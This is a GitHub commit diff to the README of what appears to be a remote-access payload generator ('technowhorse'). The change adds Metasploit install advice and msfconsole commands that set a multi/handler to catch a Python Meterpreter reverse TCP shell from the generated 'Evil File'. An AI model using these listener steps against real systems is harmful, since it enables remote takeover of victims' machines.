Skip to content

Commit 56fd169

Browse files
fix
1 parent fdf3b80 commit 56fd169

1 file changed

Lines changed: 4 additions & 1 deletion

File tree

README.md

Lines changed: 4 additions & 1 deletion
Original file line numberDiff line numberDiff line change
@@ -229,10 +229,13 @@ Note: You can also use our custom icons from the icon folder, just use them like
229229

230230
## Note:- Evil File will be saved inside dist/ folder, inside technowhorse/ folder
231231

232-
## Establishing Connection
232+
## Establishing Connection Using Msfconsole
233+
234+
* You Need to Install Metasploit-Framework on your system for establishing connection
233235

234236
* Recommended Settings, You can try to test it with any other payload in line 2
235237
```
238+
$ sudo msfconsole
236239
msf3> use exploit/multi/handler
237240
msf3> set payload python/meterpreter/reverse_tcp
238241
msf3> set LHOST 192.168.43.221

0 commit comments

Comments
 (0)